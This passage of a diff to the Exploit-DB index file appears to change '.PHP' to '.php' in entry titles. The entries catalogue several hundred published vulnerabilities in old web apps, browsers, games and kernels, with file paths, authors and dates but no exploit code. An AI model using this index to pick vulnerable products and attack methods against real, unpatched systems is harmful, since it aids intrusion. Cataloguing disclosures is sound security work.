'setup.php3' Cross-Site Scripting Vulnerability",2008-03-22,ZoRLu,php,webapps,0 31468,platforms/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages - Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,php,webapps,0 -30799,platforms/php/webapps/30799.txt,"MySpace Scripts Poll Creator Index.PHP HTML Injection Vulnerability",2007-11-22,Doz,php,webapps,0 +30799,platforms/php/webapps/30799.txt,"MySpace Scripts Poll Creator Index.php HTML Injection Vulnerability",2007-11-22,Doz,php,webapps,0 30414,platforms/windows/dos/30414.py,"GOM Player 2.2.56.5158 - (.avi) File Handling Memory Corruption Vulnerability",2013-12-20,ariarat,windows,dos,0 30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 myalbum/ratephoto.php lid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 modules/banners/click.php bid Parameter SQL Injection",2007-12-10,Lostmon,php,webapps,0 @@ -27329,7 +27330,7 @@ id,file,description,date,author,platform,type,port 30439,platforms/linux/remote/30439.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Chrome-Loaded About:Blank Script Execution Vulnerability",2007-07-31,moz_bug_r_a4,linux,remote,0 30440,platforms/cgi/webapps/30440.txt,"WebEvent <= 4.03 Webevent.CGI Cross-Site Scripting Vulnerability",2007-07-31,d3hydr8,cgi,webapps,0 30441,platforms/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 - Buffer Overflow Vulnerability",2007-07-31,"Code Audit Labs",windows,remote,0 -30442,platforms/php/webapps/30442.txt,"WebDirector Index.PHP Cross-Site Scripting Vulnerability",2007-08-01,r0t,php,webapps,0 +30442,platforms/php/webapps/30442.txt,"WebDirector Index.php Cross-Site Scripting Vulnerability",2007-08-01,r0t,php,webapps,0 30443,platforms/php/webapps/30443.txt,"WordPress Persuasion Theme 2.x - Arbitrary File Download and File Deletion Exploit",2013-12-23,"Interference Security",php,webapps,80 30444,platforms/linux/dos/30444.txt,"KDE Konqueror <= 3.5.7 Assert Denial of Service Vulnerability",2007-03-05,"Thomas Waldegger",linux,dos,0 30445,platforms/php/webapps/30445.txt,"Joomla Tour de France Pool 1.0.1 Module mosConfig_absolute_path Remote File Include Vulnerability",2007-08-02,Yollubunlar.Org,php,webapps,0 @@ -27340,7 +27341,7 @@ id,file,description,date,author,platform,type,port 30450,platforms/php/webapps/30450.txt,"LANAI CMS 1.2.14 GALLERY Module - gid Parameter SQL Injection",2007-08-03,k1tk4t,php,webapps,0 30451,platforms/asp/webapps/30451.txt,"Next Gen Portfolio Manager Default.ASP Multiple SQL Injection Vulnerabilities",2007-08-03,"Aria-Security Team",asp,webapps,0 30452,platforms/php/webapps/30452.txt,"J! Reactions 1.8.1 comPath Remote File Include Vulnerability",2007-08-04,Yollubunlar.Org,php,webapps,0 -30453,platforms/php/webapps/30453.txt,"snif 1.5.2 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0 +30453,platforms/php/webapps/30453.txt,"snif 1.5.2 Index.php Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0 30454,platforms/linux/remote/30454.txt,"BlueCat Networks Adonis 5.0.2.8 - TFTP Remote Privilege Escalation Vulnerability",2007-08-06,defaultroute,linux,remote,0 30455,platforms/windows/dos/30455.txt,"Microsoft Internet Explorer 6.0 Position:Relative Denial of Service Vulnerability",2007-08-07,Hamachiya2,windows,dos,0 30456,platforms/php/webapps/30456.txt,"VietPHP _functions.php dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 @@ -27349,10 +27350,10 @@ id,file,description,date,author,platform,type,port 30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 Password Parameter SQL Injection Vulnerability",2007-11-26,JosS,php,webapps,0 30459,platforms/php/webapps/30459.txt,"VietPHP index.php language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30462,platforms/windows/dos/30462.py,"Microsoft Windows Media Player 11 - AU Divide-By-Zero Denial of Service Vulnerability",2007-08-08,"A.Sawan and nophie",windows,dos,0 -30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 YABBSE.INC.PHP Remote File Include Vulnerability",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0 +30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 YABBSE.INC.php Remote File Include Vulnerability",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0 30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution Exploit",2014-01-14,"Arash Abedian",hardware,webapps,80 30464,platforms/linux/local/30464.c,"Generic Software Wrappers Toolkit 1.6.3 (GSWTK) - Race Condition Local Privilege Escalation",2007-08-09,"Robert N. M. Watson",linux,local,0 -30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 Index.PHP Remote File Include Vulnerability",2007-08-09,Rizgar,php,webapps,0 +30465,platforms/php/webapps/30465.txt,"Mapos-Scripts.de Gastebuch 1.5 Index.php Remote File Include Vulnerability",2007-08-09,Rizgar,php,webapps,0 30466,platforms/php/webapps/30466.txt,"File Uploader 1.1 - index.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30467,platforms/php/webapps/30467.txt,"File Uploader 1.1 - datei.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - (.rmp) Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0 @@ -27366,20 +27367,20 @@ id,file,description,date,author,platform,type,port 30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80 30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0 30478,platforms/php/webapps/30478.txt,"php MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,"cr4wl3r ",php,webapps,80 -30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 Shoutbox.PHP Remote File Include Vulnerability",2007-08-09,Rizgar,php,webapps,0 -30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 Index.PHP Remote File Include Vulnerability",2007-08-09,Rizgar,php,webapps,0 +30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 Shoutbox.php Remote File Include Vulnerability",2007-08-09,Rizgar,php,webapps,0 +30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 Index.php Remote File Include Vulnerability",2007-08-09,Rizgar,php,webapps,0 30481,platforms/php/webapps/30481.txt,"Web News 1.1 - index.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30483,platforms/php/webapps/30483.txt,"Web News 1.1 - news.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30484,platforms/bsd/local/30484.c,"Systrace Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",bsd,local,0 30485,platforms/hardware/remote/30485.html,"ZyXEL ZyWALL 2 3.62 Forms/General_1 sysSystemName Parameter XSS",2007-08-10,"Henri Lindberg",hardware,remote,0 -30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 My_Statistics.PHP Remote File Include Vulnerability",2007-08-11,"ilker Kandemir",php,webapps,0 -30487,platforms/php/webapps/30487.txt,"Php-Stats 0.1.9.2 - WhoIs.PHP Cross-Site Scripting Vulnerability",2007-08-11,vasodipandora,php,webapps,0 -30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections <= 0.8 Index.PHP Authentication Bypass Vulnerability",2007-08-11,"ilker Kandemir",php,webapps,0 +30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 My_Statistics.php Remote File Include Vulnerability",2007-08-11,"ilker Kandemir",php,webapps,0 +30487,platforms/php/webapps/30487.txt,"Php-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting Vulnerability",2007-08-11,vasodipandora,php,webapps,0 +30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections <= 0.8 Index.php Authentication Bypass Vulnerability",2007-08-11,"ilker Kandemir",php,webapps,0 30489,platforms/php/webapps/30489.txt,"Openads (phpAdsNew) <=c 2.0.8 - 'lib-remotehost.inc.php' Remote File Include Vulnerability",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0 30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 TBLinf32.DLL ActiveX Control Remote Code Execution Vulnerability",2007-05-08,"Brett Moore",windows,remote,0 30491,platforms/multiple/remote/30491.java,"OWASP Stinger Filter Bypass Weakness",2007-08-13,"Meder Kydyraliev",multiple,remote,0 -30492,platforms/php/webapps/30492.txt,"SkilMatch Systems JobLister3 Index.PHP SQL Injection Vulnerability",2007-07-13,joseph.giron13,php,webapps,0 +30492,platforms/php/webapps/30492.txt,"SkilMatch Systems JobLister3 Index.php SQL Injection Vulnerability",2007-07-13,joseph.giron13,php,webapps,0 30493,platforms/windows/remote/30493.js,"Microsoft XML Core Services <= 6.0 SubstringData Integer Overflow Vulnerability",2007-08-14,anonymous,windows,remote,0 30494,platforms/windows/dos/30494.html,"Microsoft Internet Explorer 5.0.1 Vector Markup Language VGX.DLL Remote Buffer Overflow Vulnerability",2007-08-14,"Ben Nagy and Derek Soeder",windows,dos,0 30495,platforms/multiple/remote/30495.html,"Apache Tomcat <= 6.0.13 Host Manager Servlet Cross-Site Scripting Vulnerability",2007-08-14,"NTT OSS CENTER",multiple,remote,0 @@ -27391,37 +27392,37 @@ id,file,description,date,author,platform,type,port 30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Include Vulnerabilities",2007-07-09,Crackers_Child,php,webapps,0 30502,platforms/java/remote/30502.txt,"Sun Java Runtime Environment 1.4.2 - Font Parsing Remote Privilege Escalation Vulnerability",2007-08-15,"John Heasman",java,remote,0 30503,platforms/linux/local/30503.txt,"BlueCat Networks Adonis 5.0.2.8 - CLI Remote Privilege Escalation Vulnerability",2007-08-16,forloop,linux,local,0 -30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 Admin.PHP Remote Authentication Bypass Vulnerability",2007-07-16,imei,php,webapps,0 +30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 Admin.php Remote Authentication Bypass Vulnerability",2007-07-16,imei,php,webapps,0 30505,platforms/asp/webapps/30505.txt,"Text File Search Classic TextFileSearch.ASP Cross-Site Scripting Vulnerability",2007-08-17,GeFORC3,asp,webapps,0 30506,platforms/hardware/dos/30506.txt,"Cisco IOS <= 12.3 Show IP BGP Regexp Remote Denial of Service Vulnerability",2007-08-17,anonymous,hardware,dos,0 30507,platforms/multiple/remote/30507.txt,"gMotor2 Game Engine - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",multiple,remote,0 30508,platforms/multiple/remote/30508.txt,"Toribash 2.x - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",multiple,remote,0 -30509,platforms/php/webapps/30509.txt,"Dalai Forum 1.1 Forumreply.PHP Local File Include Vulnerability",2007-08-20,DarKdewiL,php,webapps,0 -30510,platforms/php/webapps/30510.txt,"Firesoft Class_TPL.PHP Remote File Include Vulnerability",2007-08-20,DarKdewiL,php,webapps,0 -30511,platforms/php/webapps/30511.txt,"Gurur Haber 2.0 Uyeler2.PHP SQL Injection Vulnerability",2007-08-20,dumenci,php,webapps,0 +30509,platforms/php/webapps/30509.txt,"Dalai Forum 1.1 Forumreply.php Local File Include Vulnerability",2007-08-20,DarKdewiL,php,webapps,0 +30510,platforms/php/webapps/30510.txt,"Firesoft Class_TPL.php Remote File Include Vulnerability",2007-08-20,DarKdewiL,php,webapps,0 +30511,platforms/php/webapps/30511.txt,"Gurur Haber 2.0 Uyeler2.php SQL Injection Vulnerability",2007-08-20,dumenci,php,webapps,0 30512,platforms/windows/dos/30512.txt,"Total Commander FileInfo 2.09 Plugin - Multiple PE File Denial of Service Vulnerabilities",2007-07-20,"Gynvael Coldwind",windows,dos,0 30513,platforms/multiple/dos/30513.txt,"Epic Games Unreal Engine Logging Function - Remote Denial of Service Vulnerability",2007-08-20,"Luigi Auriemma",multiple,dos,0 30514,platforms/java/webapps/30514.txt,"ALeadSoft Search Engine Builder Search.HTML Cross-Site Scripting Vulnerability",2007-08-21,MustLive,java,webapps,0 -30515,platforms/php/webapps/30515.txt,"coWiki Index.PHP Cross-Site Scripting Vulnerability",2007-08-21,MustLive,php,webapps,0 -30516,platforms/php/webapps/30516.txt,"m-phorum 0.3 Index.PHP Cross-Site Scripting Vulnerability",2007-08-21,CodeXpLoder'tq,php,webapps,0 +30515,platforms/php/webapps/30515.txt,"coWiki Index.php Cross-Site Scripting Vulnerability",2007-08-21,MustLive,php,webapps,0 +30516,platforms/php/webapps/30516.txt,"m-phorum 0.3 Index.php Cross-Site Scripting Vulnerability",2007-08-21,CodeXpLoder'tq,php,webapps,0 30517,platforms/hardware/dos/30517.pl,"Grandstream GXV-3000 Phone Remote Denial of Service Vulnerability",2007-08-22,MADYNES,hardware,dos,0 30518,platforms/php/webapps/30518.txt,"Ripe Website Manager 0.8.x pages/delete_page.php id Parameter SQL Injection",2007-08-22,"Nagendra Kumar G",php,webapps,0 30519,platforms/multiple/dos/30519.txt,"Asura Engine Challenge B Query - Remote Stack Buffer Overflow Vulnerability",2007-08-22,"Luigi Auriemma",multiple,dos,0 -30520,platforms/php/webapps/30520.txt,"WordPress 1.0.7 - Pool Index.PHP Cross-Site Scripting Vulnerability",2007-08-13,MustLive,php,webapps,0 +30520,platforms/php/webapps/30520.txt,"WordPress 1.0.7 - Pool Index.php Cross-Site Scripting Vulnerability",2007-08-13,MustLive,php,webapps,0 30521,platforms/multiple/remote/30521.txt,"Unreal Commander 0.92 - ZIP / RAR Archive Handling Traversal Arbitrary File Overwrite",2007-08-23,"Gynvael Coldwind",multiple,remote,0 30546,platforms/windows/local/30546.txt,"Multiple MicroWorld eScan Products - Local Privilege Escalation Vulnerability",2007-08-30,"Edi Strosar",windows,local,0 30523,platforms/multiple/remote/30523.txt,"Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow Vulnerability",2007-08-23,"Luigi Auriemma",multiple,remote,0 30524,platforms/multiple/dos/30524.txt,"Soldat 1.4.2 - Multiple Remote Denial of Service Vulnerabilities",2007-08-23,"Luigi Auriemma",multiple,dos,0 -30525,platforms/php/webapps/30525.txt,"Arcadem 2.01 Index.PHP Remote File Include Vulnerability",2007-08-24,sm0k3,php,webapps,0 +30525,platforms/php/webapps/30525.txt,"Arcadem 2.01 Index.php Remote File Include Vulnerability",2007-08-24,sm0k3,php,webapps,0 30526,platforms/multiple/dos/30526.txt,"Vavoom 1.24 sv_main.cpp Say Command Remote Format String",2007-08-24,"Luigi Auriemma",multiple,dos,0 30527,platforms/multiple/dos/30527.txt,"Vavoom 1.24 str.cpp VStr::Resize Function Crafted UDP Packet Remote DoS",2007-08-24,"Luigi Auriemma",multiple,dos,0 30528,platforms/multiple/dos/30528.txt,"Vavoom 1.24 p_thinker.cpp VThinker::BroadcastPrintf Function Multiple Field Remote Overflow",2007-08-24,"Luigi Auriemma",multiple,dos,0 30529,platforms/multiple/dos/30529.txt,"Media Player Classic 6.4.9 - - FLI File Remote Buffer Overflow Vulnerability",2007-08-24,wushi,multiple,dos,0 30530,platforms/hardware/dos/30530.pl,"Thomson SpeedTouch 2030 SIP Invite Message Remote Denial of Service Vulnerability",2007-08-27,"Humberto J. Abdelnur",hardware,dos,0 -30531,platforms/php/webapps/30531.txt,"AutoIndex PHP Script 2.2.1 Index.PHP Cross-Site Scripting Vulnerability",2007-08-27,d3hydr8,php,webapps,0 +30531,platforms/php/webapps/30531.txt,"AutoIndex PHP Script 2.2.1 Index.php Cross-Site Scripting Vulnerability",2007-08-27,d3hydr8,php,webapps,0 30532,platforms/windows/remote/30532.pl,"Motorola Timbuktu Pro 8.6.3.1367 - Directory Traversal Vulnerability",2007-08-27,titon,windows,remote,0 -30533,platforms/php/webapps/30533.txt,"Dale Mooney Calendar Events Viewevent.PHP SQL Injection Vulnerability",2007-08-27,s0cratex,php,webapps,0 -30534,platforms/php/webapps/30534.txt,"PhpGedView 4.1 Login.PHP Cross-Site Scripting Vulnerability",2007-08-27,"Joshua Morin",php,webapps,0 +30533,platforms/php/webapps/30533.txt,"Dale Mooney Calendar Events Viewevent.php SQL Injection Vulnerability",2007-08-27,s0cratex,php,webapps,0 +30534,platforms/php/webapps/30534.txt,"PhpGedView 4.1 Login.php Cross-Site Scripting Vulnerability",2007-08-27,"Joshua Morin",php,webapps,0 30535,platforms/linux/remote/30535.pl,"ISC BIND 8 - Remote Cache Poisoning Vulnerability (1)",2007-08-27,"Amit Klein",linux,remote,0 30536,platforms/linux/remote/30536.pl,"ISC BIND 8 - Remote Cache Poisoning Vulnerability (2)",2007-08-27,"Amit Klein",linux,remote,0 30537,platforms/windows/remote/30537.txt,"Microsoft MSN Messenger <= 8.0 - Video Conversation Buffer Overflow Vulnerability",2007-08-28,wushi,windows,remote,0 @@ -27444,12 +27445,12 @@ id,file,description,date,author,platform,type,port 30973,platforms/multiple/remote/30973.txt,"InfoSoft FusionCharts 3 SWF Flash File Remote Code Execution Vulnerability",2008-01-02,"Rich Cannings",multiple,remote,0 30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - form.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - admin/header.php Multiple Parameter XSS",2007-09-07,cod3in,php,webapps,0 -30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 Admin.PHP Authentication Bypass Vulnerability",2007-09-03,Demential,php,webapps,0 +30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 Admin.php Authentication Bypass Vulnerability",2007-09-03,Demential,php,webapps,0 30556,platforms/php/webapps/30556.html,"Claroline 1.x inc/lib/language.lib.php language Parameter Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",php,webapps,0 30557,platforms/php/webapps/30557.txt,"Claroline 1.x admin/adminusers.php dir Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0 30558,platforms/php/webapps/30558.txt,"Claroline 1.x admin/advancedUserSearch.php action Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0 30559,platforms/php/webapps/30559.txt,"Claroline 1.x admin/campusProblem.php view Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0 -30560,platforms/php/webapps/30560.txt,"212cafe Webboard 6.30 Read.PHP SQL Injection Vulnerability",2007-09-04,"Lopez Bran Digrap",php,webapps,0 +30560,platforms/php/webapps/30560.txt,"212cafe Webboard 6.30 Read.php SQL Injection Vulnerability",2007-09-04,"Lopez Bran Digrap",php,webapps,0 31024,platforms/hardware/remote/31024.txt,"F5 BIG-IP <= 9.4.3 - 'SearchString' Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,nnposter,hardware,remote,0 31025,platforms/cgi/webapps/31025.txt,"Garment Center 'index.cgi' Local File Include Vulnerability",2008-01-14,Smasher,cgi,webapps,0 30877,platforms/php/webapps/30877.txt,"Roundcube Webmail 0.1 CSS Expression Input Validation Vulnerability",2007-11-10,"Tomas Kuliavas",php,webapps,0 @@ -27465,11 +27466,11 @@ id,file,description,date,author,platform,type,port 30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE 7-zip32.dll 4.42 Heap-Based Buffer Overflow Vulnerability",2007-09-04,miyy3t,windows,remote,0 30566,platforms/multiple/dos/30566.txt,"Alien Arena 2007 6.10 - Multiple Remote Vulnerabilities",2007-09-05,"Luigi Auriemma",multiple,dos,0 30567,platforms/windows/remote/30567.html,"Microsoft Agent agentdpv.dll ActiveX Control Malformed URL Stack Buffer Overflow Vulnerability",2007-09-11,"Yamata Li",windows,remote,0 -30568,platforms/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 Index.PHP Local File Include Vulnerability",2007-09-06,mafialbano,php,webapps,0 +30568,platforms/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 Index.php Local File Include Vulnerability",2007-09-06,mafialbano,php,webapps,0 30569,platforms/windows/remote/30569.py,"Unreal Commander 0.92 - Directory Traversal",2007-09-06,"Gynvael Coldwind",windows,remote,0 -30570,platforms/php/webapps/30570.txt,"Toms Gastebuch 1.00/1.01 Header.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-09-08,hd1979,php,webapps,0 +30570,platforms/php/webapps/30570.txt,"Toms Gastebuch 1.00/1.01 Header.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-08,hd1979,php,webapps,0 30571,platforms/asp/webapps/30571.txt,"Proxy Anket 3.0.1 anket.asp SQL Injection Vulnerability",2007-09-10,Yollubunlar.Org,asp,webapps,0 -30572,platforms/php/webapps/30572.txt,"phpMyQuote 0.20 Index.PHP SQL Injection and Cross-Site Scripting Vulnerabilities",2007-09-10,Yollubunlar.Org,php,webapps,0 +30572,platforms/php/webapps/30572.txt,"phpMyQuote 0.20 Index.php SQL Injection and Cross-Site Scripting Vulnerabilities",2007-09-10,Yollubunlar.Org,php,webapps,0 30573,platforms/php/webapps/30573.txt,"SisfoKampus dwoprn.php Arbitrary File Download Vulnerability",2007-09-10,PUPET,php,webapps,0 30574,platforms/multiple/dos/30574.txt,"CellFactor Revolution 1.03 - Multiple Remote Code Execution Vulnerabilities",2007-09-10,"Luigi Auriemma",multiple,dos,0 30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 forum_forum.php id Parameter XSS",2007-09-12,Doz,php,webapps,0 @@ -27517,7 +27518,7 @@ id,file,description,date,author,platform,type,port 30580,platforms/linux/dos/30580.txt,"KMPlayer 2.9.3.1214 - Multiple Remote Denial of Service Vulnerabilities",2007-09-12,"Code Audit Labs",linux,dos,0 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 Login Credentials Information Disclosure Vulnerability",2007-09-12,Cr@zy_King,php,webapps,0 30582,platforms/windows/remote/30582.html,"WinSCP <= 4.0.3 URL Protocol Handler Arbitrary File Access Vulnerability",2007-09-13,Kender.Security,windows,remote,0 -30583,platforms/php/webapps/30583.txt,"Php-Stats 0.1.9.2 - Tracking.PHP Cross-Site Scripting Vulnerability",2007-09-14,root@hanicker.it,php,webapps,0 +30583,platforms/php/webapps/30583.txt,"Php-Stats 0.1.9.2 - Tracking.php Cross-Site Scripting Vulnerability",2007-09-14,root@hanicker.it,php,webapps,0 30584,platforms/linux/dos/30584.py,"Boa 0.93.15 Administrator Password Overwrite Authentication Bypass Vulnerability",2007-09-14,"Luca Carettoni",linux,dos,0 30585,platforms/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera Web Interface axis-cgi/admin/restart.cgi CSRF",2007-09-14,"Seth Fogie",cgi,webapps,0 30586,platforms/cgi/webapps/30586.txt,"Axis Communications 207W Network Camera Web Interface axis-cgi/admin/pwdgrp.cgi Multiple Parameter CSRF",2007-09-14,"Seth Fogie",cgi,webapps,0 @@ -27541,14 +27542,14 @@ id,file,description,date,author,platform,type,port 30604,platforms/linux/local/30604.c,"Linux Kernel 2.6.x - Ptrace Local Privilege Escalation Vulnerability",2007-09-21,"Wojciech Purczynski",linux,local,0 30605,platforms/linux/local/30605.c,"Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability",2007-09-21,Karimo_DM,linux,local,0 30606,platforms/cgi/webapps/30606.txt,"Urchin 5.7.x session.cgi Cross-Site Scripting Vulnerability",2007-09-24,pagvac,cgi,webapps,0 -30607,platforms/php/webapps/30607.txt,"bcoos 1.0.10 Arcade Module Index.PHP SQL Injection Vulnerability",2007-09-24,"nights shadow",php,webapps,0 +30607,platforms/php/webapps/30607.txt,"bcoos 1.0.10 Arcade Module Index.php SQL Injection Vulnerability",2007-09-24,"nights shadow",php,webapps,0 30608,platforms/jsp/webapps/30608.txt,"JSPWiki <= 2.5.139 NewGroup.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 30609,platforms/jsp/webapps/30609.txt,"JSPWiki <= 2.5.139 Edit.jsp edittime Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 30610,platforms/jsp/webapps/30610.txt,"JSPWiki <= 2.5.139 Comment.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 30611,platforms/jsp/webapps/30611.txt,"JSPWiki <= 2.5.139 UserPreferences.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 30612,platforms/jsp/webapps/30612.txt,"JSPWiki <= 2.5.139 Login.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 30613,platforms/jsp/webapps/30613.txt,"JSPWiki <= 2.5.139 Diff.jsp Multiple Parameter XSS",2007-09-25,"Jason Kratzer",jsp,webapps,0 -30614,platforms/php/webapps/30614.txt,"PHP-Nuke Dance Music Module Index.PHP Local File Include Vulnerability",2007-09-25,waraxe,php,webapps,0 +30614,platforms/php/webapps/30614.txt,"PHP-Nuke Dance Music Module Index.php Local File Include Vulnerability",2007-09-25,waraxe,php,webapps,0 30615,platforms/php/webapps/30615.txt,"SimpGB 1.46.2 admin/ Default URI l_username Parameter XSS",2007-09-25,netVigilance,php,webapps,0 30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 admin/emoticonlist.php l_emoticonlist Parameter XSS",2007-09-25,netVigilance,php,webapps,0 30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 admin/layout2b.php l_username Parameter XSS",2007-09-25,"Jesper Jurcenoks",php,webapps,0 @@ -27557,7 +27558,7 @@ id,file,description,date,author,platform,type,port 30620,platforms/linux/local/30620.txt,"Xen 3.0.3 pygrub TOOLS/PYGRUB/SRC/GRUBCONF.PY Local Command Injection Vulnerability",2007-09-22,"Joris van Rantwijk",linux,local,0 30621,platforms/asp/webapps/30621.txt,"Novus 1.0 Buscar.ASP Cross-Site Scripting Vulnerability",2007-09-27,Zutr4,asp,webapps,0 30622,platforms/windows/remote/30622.html,"Microsoft Internet Explorer 5.0.1 File Upload Vulnerability",2007-09-27,"Ronald van den Heetkamp",windows,remote,0 -30623,platforms/php/webapps/30623.pl,"MD-Pro 1.0.76 Index.PHP Firefox ID SQL Injection Vulnerability",2007-09-29,"unidentified1_ is",php,webapps,0 +30623,platforms/php/webapps/30623.pl,"MD-Pro 1.0.76 Index.php Firefox ID SQL Injection Vulnerability",2007-09-29,"unidentified1_ is",php,webapps,0 30624,platforms/asp/webapps/30624.txt,"Netkamp Emlak Scripti Multiple Input Validation Vulnerabilities",2007-10-01,GeFORC3,asp,webapps,0 30625,platforms/asp/webapps/30625.txt,"Ohesa Emlak Portal 1.0 satilik.asp Kategori Parameter SQL Injection",2007-10-01,GeFORC3,asp,webapps,0 30626,platforms/asp/webapps/30626.txt,"Ohesa Emlak Portal 1.0 detay.asp Emlak Parameter SQL Injection",2007-10-01,GeFORC3,asp,webapps,0 @@ -27566,13 +27567,13 @@ id,file,description,date,author,platform,type,port 30629,platforms/asp/webapps/30629.txt,"ASP Product Catalog 1.0 Default.ASP SQL Injection Vulnerability",2007-10-01,joseph.giron13,asp,webapps,0 30630,platforms/multiple/remote/30630.c,"id Software Doom 3 Engine Console String Visualization Format String Vulnerability",2007-10-02,"Luigi Auriemma",multiple,remote,0 30631,platforms/multiple/remote/30631.txt,"Google Mini Search Appliance 3.4.14 IE Parameter Cross-Site Scripting Vulnerability",2007-09-20,Websecurity,multiple,remote,0 -30632,platforms/php/webapps/30632.txt,"DRBGuestbook 1.1.13 Index.PHP Cross-Site Scripting Vulnerability",2007-10-03,Gokhan,php,webapps,0 -30633,platforms/php/webapps/30633.txt,"Uebimiau 2.7.x Index.PHP Cross-Site Scripting Vulnerability",2007-10-03,"Ivan Sanches",php,webapps,0 +30632,platforms/php/webapps/30632.txt,"DRBGuestbook 1.1.13 Index.php Cross-Site Scripting Vulnerability",2007-10-03,Gokhan,php,webapps,0 +30633,platforms/php/webapps/30633.txt,"Uebimiau 2.7.x Index.php Cross-Site Scripting Vulnerability",2007-10-03,"Ivan Sanches",php,webapps,0 30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 postComment.php Remote File Include Vulnerability",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0 30635,platforms/windows/remote/30635.pl,"Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (1)",2007-11-13,"Alla Berzroutchko",windows,remote,0 30636,platforms/windows/remote/30636.pl,"Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (2)",2007-11-13,"Alla Berzroutchko",windows,remote,0 30637,platforms/php/webapps/30637.js,"Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery Vulnerability",2007-10-04,"David Kierznowski",php,webapps,0 -30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 Verify.PHP Cross-Site Scripting Vulnerability",2007-10-04,"Jose Sanchez",php,webapps,0 +30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 Verify.php Cross-Site Scripting Vulnerability",2007-10-04,"Jose Sanchez",php,webapps,0 30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure 